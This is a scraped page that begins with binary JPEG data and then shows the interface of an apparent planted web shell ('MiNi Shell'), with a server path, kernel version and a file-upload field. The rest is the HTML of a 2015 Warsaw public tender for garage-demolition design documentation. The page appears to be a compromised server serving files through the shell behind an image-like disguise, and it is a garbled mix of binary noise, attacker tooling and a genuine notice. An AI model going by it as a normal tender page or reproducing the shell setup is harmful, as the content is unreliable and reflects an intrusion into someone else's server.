JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150812/206168-N-2015.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji projektowej i kosztorysowej na rozbiórkę hali garażowej z pochylnią przy ul. Stępińskiej 51 w Warszawie</b><br>
<b>Numer ogłoszenia: 206168 - 2015; data zamieszczenia: 12.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej i kosztorysowej na rozbiórkę hali garażowej z pochylnią przy ul. Stępińskiej 51 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia oraz warunki jego realizacji.
Przedmiotem zamówienia jest wykonanie dokumentacji projektowej i kosztorysowej na rozbiórkę hali garażowej z pochylnią przy ul. Stępińskiej 51 w Warszawie zgodnie z założeniami projektowymi i kosztorysowymi,  przedstawionymi pkt 3.1.1. SIWZ, stanowiącymi również załącznik nr 3 do Rozdziału III SIWZ - istotnych postanowień umowy.
	
             1.1. Opis przedmiotu zamówienia wg założeń projektowych i   
                         kosztorysowych   stanowiących załącznik nr 3 do Rozdziału III SIWZ - 
                         istotnych postanowień umowy cyt.:

ZAŁOŻENIA PROJEKTOWO-KOSZTORYSOWE
na wykonanie dokumentacji projektowo-kosztorysowej na rozbiórkę hali garażowej z pochylnią przy ul. Stępińskiej 51 w Warszawie.
    
 Informacje techniczne o budynku:
Rok budowy : prawdopodobnie 1972
Kubatura łączna budynku - około 1036 m3
Zjazd do hali z murami oporowymi dł. 18,0 m, szer. 3,0m, wys. 3,0m  27 m3 
Schody zejścia do hali po obu stronach dł. 6,0 m, szer. 1,50 m wys. 3,0m, z murami oporowymi  18 m3

  Pochylnia dla niepełnosprawnych dł. 11,5 m, szer. 1,50 m wys. śr. 0,6m             10,35 m3
Liczba kondygnacji:        1
Liczba klatek schodowych:     0
Pow. użytkowa budynku:      293,80 m2
Istniejące instalacje w budynku:  kanalizacja deszczowa, inst. elektryczna, inst. c.o. wentylacja grawitacyjna.

Wytyczne szczegółowe do projektu:
Hala garażowa nie jest ujęta w Gminnej Ewidencji Zabytków, ani w Rejestrze Konserwatora Zabytków.
Hala garażowa wolnostojąca jednokondygnacyjna, częściowo zagłębiona w gruncie. Zjazd do hali z murami oporowymi oraz schodami po obu stronach zjazdu. 
Pochylnia dla niepełnosprawnych przy balkonie budynku Stępińska 49A. Dojazd do nieruchomości możliwy jedynie zjazdem od strony ulicy Stępińskiej. 
Teren jest własnością miasta st. Warszawy.

Wyklucza się metodę minerską rozbiórki.
Wyklucza się składowanie materiałów z rozbiórki.
Rozbiórka kominów, stropodachu, ścian nośnych, ścian fundamentowych, posadzek.
Rozbiórka zjazdu do hali z rozbiórką murów oporowych i fundamentów oraz schodów po obu stronach zjazdu.
Rozbiórka pochylni dla niepełnosprawnych.
Wywóz gruzu.
Zasypanie miejsca rozbiórki piaskiem z ziemią z wykorzystaniem nadmiaru ziemi po rozbiórce pochylni dla niepełnosprawnych. 
Niwelacja terenu po rozbiórce hali garażowej ze zjazdem i schodami oraz pochylni dla niepełnosprawnych do istniejącego poziomu terenu w obrębie budynków mieszkalnych Stępińska 47-49, 49A, 51 z uzwględnieniem spadków terenu od budynków. Istnieje konieczność zinwentaryzowania rzędnych istniejących 
i projektowanych na obszarze opracowania zgodnie z załączonym szkicem. Koncepcję projektową i organizację robót należy uzgodnić z Zamawiającym.
Wykonać uproszczoną inwentaryzację w zakresie niezbędnym do sprawdzenia przedmiaru robót.
Odtworzenie ciągów pieszych i istniejącego zagospodarowania terenu. Teren zajęty przez zaplecze rozbiórki nie może utrudniać mieszkańcom dostępu do ciągów pieszo-jezdnych.

Instalacje sanitarne, c.o. i wentylacja:
- Obecnie w hali garażowej czynna jest tylko kanalizacja - należy zaprojektować 
  wyprowadzenie pierwszej studzienki do poziomu terenu zakończyć włazem 
  rewizyjnym, do tej studzienki należy zaprojektować nowe wpusty podwórzowe 
  odprowadzające wody deszczowe z terenu od strony budynku Stępińska 47-49, 49A i 
  Stępińska 51, pozostałe odwodnienia w obecnej hali garażowej trwale zakorkować.
- Instalacja wodna - nieczynna odłączona w budynku Stępińska 49A - do demontażu
- Instalacja centralnego ogrzewania - nieczynna odłączona w budynku Stępińska 49A - 
  do demontażu
- Wentylacja mechaniczna - nieczynna odłączona w budynku Stępińska 51 - do 
  demontażu

Instalacja elektryczna:
Należy zaprojektować demontaż istniejącej instalacji elektrycznej garażu od tablicy głównej znajdującej się  w budynku Stępińska 51.
Demontaż zasilenia garażu trójfazowego, wykonanego kablem AKY 4 x 16 mm2 
Demontaż osprzętu bakelitowego i metalowego: 
- wyłączniki bakelitowe -11 szt.,
- gniazdka 24 V - 12 szt.,
- oprawy oświetleniowe, kanałowe 36 szt.,
- skrzynki rozdziałowe i sterujące oświetleniem - żeliwne - 6 szt.
Budynek użytkowy. Bryła prosta, na rzucie kwadratu. Konstrukcja budynku wykonana metodą tradycyjną. Układ konstrukcyjny podłużny. Ściany konstrukcyjne żelbetowe, ściany osłonowe murowane z cegły otynkowane tynkiem cementowo- - wapiennym. Stropodach ceramiczny Ackermana lub DZ 3 niewentylowany, z wylewką cementową, z ogniomurem, kryty papą. Odwodnienie dachu wykonane prostokątnymi blaszanymi rzygaczami, które są pogięte i skorodowane. Kominy murowane z cegły, obróbki kominów z blachy ocynkowanej.
Wrota garażowe i drzwi wejściowe drewniane, wewnątrz hali posadzka cementowa, słupy i podciągi żelbetowe, blaszane kanały nieczynnej wentylacji mechanicznej.
Zjazd do garażu z trylinki. Mury oporowe murowane z cegły z okładziną lastrykową.
Pochylnia dla niepełnosprawnych wykonana jako nasyp ziemny z nawierzchnią wyłożoną  płytami chodnikowymi z obrzeżem. 

Zakres zamawianego opracowania:
Przedmiotem zamówienia jest opracowanie dokumentacji projektowej i kosztorysowej z  przedmiarem robót niezbędnych do wykonania rozbiórki budynku użytkowego - hali garażowej oraz pochylni dla niepełnosprawnych przy ul. Stępińskiej 51 z wywiezieniem gruzu, zasypaniem i uporządkowaniem  terenu:
- wykonanie inwentaryzacji ogólnej niezbędnej do opracowania na te roboty   
  dokumentacji techniczno-  projektowej.
- opracowanie technologii rozbiórki budynku. 
- określenie kolejności prowadzenia robot;
- opracowanie kosztorysu inwestorskiego z przedmiarem robót;
- opracowanie specyfikacji technicznej wykonania i odbioru robót;
- opracowanie informacji BIOZ;
Przed przystąpieniem do projektowania należy zaznajomić się z posiadanymi przez inwestora dokumentami.

Wymagania szczegółowe zamawiającego:
- projekt wykonawczy należy uzgodnić z Kierownikiem DOM Konduktorska
- projekt wykonawczy należy opracować w 5-ciu oprawionych egzemplarzach w skali   
  1:50; 
- dokumentacja projektowa powinna być opracowana na podstawie RMI z dnia 
  02.09.2004 r.; (tekst jedn. Dz. U. z 2013r., nr 1129)
- projekt budowlany należy wykonać zgodnie z obowiązującymi przepisami prawa oraz 
  RMI z dnia 12.04.2002 r.;
- dokumentacja projektowa musi spełniać wymagania określone w Rozporządzeniu 
  Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy 
  projektu budowlanego (Dz. U. Nr 120 poz. 1133 z 2003 r.), oraz posiadać wszelkie 
  niezbędne uzgodnienia;
- kosztorys inwestorski z przedmiarem robót powinien spełniać wymagania 
  określone w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w 
  sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, 
  obliczania planowanych kosztów prac projektowych oraz planowanych kosztów
  robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 
  130  z 2004 r., poz. 1389);
- wszystkie opracowania muszą być oprawione, przynajmniej dwa egzemplarze projektu 
  winny zawierać pełne obliczenia. Projekt budowlany wraz z załącznikami należy 
  wykonać również w wersji elektronicznej (płyta CD).

Posiadane dokumenty projektowe związane z przedmiotem zamówienia: 
- Oświadczenie zamawiającego stwierdzające jego prawo do dysponowania nieruchomością;

ZAŁOŻENIA KOSZTORYSOWE:

Podstawowe założenia do dokumentacji kosztorysowej:
Kosztorys inwestorski i przedmiar robót należy wykonać w 2 egzemplarzach, dodatkowo
w wersji elektronicznej (za pomocą programu kosztorysowego NORMA na płycie CD) 
z rozszerzeniem ATH. Kosztorys inwestorski musi być wykonany zgodnie 
z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia 
metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych 
kosztów prac projektowych oraz planowanych kosztów robót budowlanych, określonych 
w programie funkcjonalno- użytkowym (Dz. U. Nr 130 poz. 1389 z 2004 r.).
Każdy egzemplarz kosztorysu inwestorskiego powinien być trwale oprawiony wraz z przedmiarem robót dla potrzeb sporządzenia kosztorysu inwestorskiego.
Kosztorys inwestorski wykonać metodą szczegółową w oparciu o kosztorysowe normy nakładów rzeczowych określone w katalogach KNR wydanych przez Ministra Gospodarki Przestrzennej i Budownictwa oraz normy zakładowe ZGN, a w przypadku braku w nich odpowiednich nakładów rzeczowych należy zastosować katalogi KNR - W wydane przez WACETOB. W przypadku braku odpowiednich pozycji również w tych katalogach (lub możliwości zastosowania analogii do nich) można wykorzystać inne dostępne na rynku katalogi norm albo wykonać kalkulację indywidualną po zaakceptowaniu przez Zamawiającego tj. inspektora nadzoru i Kierownika DOM.

W kalkulacji szczegółowej cen jednostkowych należy przyjąć następujące ceny czynników produkcji oraz wskaźniki narzutów:
- stawkę robocizny kosztorysowej R - jako średnią stawkę dla miasta Warszawy stawkę 
  za jedną roboczogodzinę w danej branży publikowaną w wydawnictwach 
  SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji 
  projektowej i kosztorysowej,
- ceny jednostkowe materiałów M - jako średnie wraz z kosztami zakupu ceny 
  materiałów, publikowane w wydawnictwach SEKOCENBUD Informacjach o cenach 
  czynników produkcji RMS (IMB, IME, IMS) - wydanie aktualne dla daty sporządzenia 
  dokumentacji projektowej i kosztorysowej, 
- ceny jednostkowe pracy sprzętu S - jako średnie dla miasta Warszawy ceny pracy 
  sprzętu, publikowane w wydawnictwach SEKOCENBUD Informacjach o cenach
  czynników produkcji RMS lub IRS - wydanie aktualne dla daty sporządzenia 
  dokumentacji projektowej i kosztorysowej,
- wskaźnik narzutu kosztów pośrednich Wkp - jako średni dla miasta Warszawy 
  wskaźnik w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - 
  wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. 
  Koszty pośrednie Kp należy liczyć od (R+S),
- wskaźnik narzutu zysku Wz - jako średni dla miasta Warszawy wskaźnik w danej 
  branży, publikowany w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla 
  daty sporządzenia dokumentacji projektowej i kosztorysowej. Zysk Z należy liczyć od 
  (R+S+Kp),
W założeniach wyjściowych do kosztorysowania należy przyjmować następujące ceny czynników produkcji oraz wskaźniki narzutów (dot: R, Kp, Z) 
- stawka robocizny kosztorysowej jako średnia dla miasta Warszawy publikowana w 
  wydawnictwach SEKOCENBUD - wydanie aktualne dla daty sporządzenia dokumentacji 
  kosztorysowej
- koszty pośrednie jako średnie dla miasta Warszawy publikowane w wydawnictwach
  SEKOCENBUD - wydanie aktualne dla daty sporządzenia dokumentacji kosztorysowej
- Zysk Z- 9,8%, średni publikowany w wydawnictwach SEKOCENBUD - wydanie aktualne 
  dla daty sporządzenia dokumentacji kosztorysowej
 
Przedmiar robót dla każdej branży - wykonać 2 komplety:
przedmiar robót dla potrzeb sporządzania kosztorysu inwestorskiego
przedmiar robót dla Wykonawcy

Ad. a. przedmiar robót dla potrzeb sporządzenia kosztorysu inwestorskiego wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcyjno - użytkowym (Dz. U. Nr 130 z 2004r., poz. 1389), w 2-ch egz. oraz w wersji elektronicznej (płyta CD) z rozszerzeniem ATH (NORMA) dla danej branży.
Każdy egzemplarz przedmiaru powinien być trwale oprawiony wraz z kosztorysem inwestorskim.
Ad. b. przedmiar robót dla Wykonawcy wykonać zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcyjno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.), w 2-ch egz. oraz w wersji elektronicznej (płyta CD) z rozszerzeniem ATH (NORMA) dla danej branży.
Każdy egzemplarz przedmiaru powinien być trwale oprawiony wraz z kosztorysem inwestorskim.

Specyfikację techniczną wykonania i odbioru robót budowlanych dla każdej branży wykonać zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r., w 2-ch egz. oraz na nośniku elektronicznym (płyta CD).

         1.1.2. Budynek jest administrowany przez ZGN Mokotów i znajduje się na    
  terenie DOM Konduktorska, ul. Konduktorska 12, Warszawa.

2.  Szczegółowe określenie zakresu prac projektowo-kosztorysowych, o których mowa 
         w pkt 3.1. siwz zawierają założenia projektowe i kosztorysowe, stanowiące 
         załącznik nr 3 do  III Rozdziału SIWZ - istotnych postanowień umowy. 
              Przy opracowaniu projektu należy dążyć do minimalizacji kosztów robót 
              wykonanych na podstawie projektu.    

3. Jednostka projektowa zobowiązana jest do pełnienia bezpłatnie nadzoru autorskiego
    zgodnie z obowiązującymi w tym zakresie przepisami prawa w czasie wykonywania 
    robót na podstawie tej dokumentacji. 

4. Wykonawca jest zobowiązany do przeniesienia praw autorskich na Zamawiającego.

5. Czynności, o których mowa w pkt. 3.1. - 3.2. specyfikacji mają być wykonane zgodnie z:
       5.1. warunkami wynikającymi z przepisów technicznych i Prawa Budowlanego, 
       5.2. wymogami wynikającymi z Polskich Norm, w sposób czytelny i jednoznaczny z podaniem legendy indywidualnych oznaczeń graficznych,
       5.3. zasadami rzetelnej wiedzy technicznej i sztuką budowlaną,
       5.4. założeniami projektowymi i kosztorysowymi do wykonania dokumentacji   
                  projektowo - kosztorysowej, stanowiącymi załącznik nr 3 do III Rozdziału
                  specyfikacji istotnych warunków zamówienia - istotnych postanowień umowy,
       5.5. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia,
       5.6.  postanowieniami ustawy Prawo zamówień publicznych. 

6. Kosztorys oraz przedmiar  robót powinien obejmować pełen zakres robót niezbędny  
    do realizacji zamówienia. 

7. W przypadku wystąpienia wad ukrytych w dokumentacji, których nie ujawniono           
    w  czasie jej odbioru, Jednostka Projektowa zobowiązana będzie nieodpłatnie 
    do naniesienia poprawek i uzupełnień w terminie 3-ch dni od daty zawiadomienia.
                                                                                                
8. Wykonawca, przy realizacji zamówienia, zobowiązany jest do uzyskania dostępu 
             do pomieszczeń we własnym zakresie.

9. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z  późn. zm.)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających
     stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, o których 
     mowa w art. 67 ust. 1 pkt  6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień 
     publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 65.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.1.Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie 
             realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  
             w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
             jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
             wykonał, a w przypadku świadczeń okresowych lub ciągłych również 
             wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji 
             projektowo-kosztorysowej odpowiadającej przedmiotowi zamówienia,  o 
             wartości nie mniejszej niż 12.000,00 zł brutto każda. 
                           Spełnienie ww  warunku Zamawiający oceniał będzie na podstawie 
                           załączonego do oferty wykazu wykonanych głównych usług, określonych 
                           w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4 
                           do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6. 
                           SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w 
                           sposób należyty lub są wykonywane należycie.
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia   zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
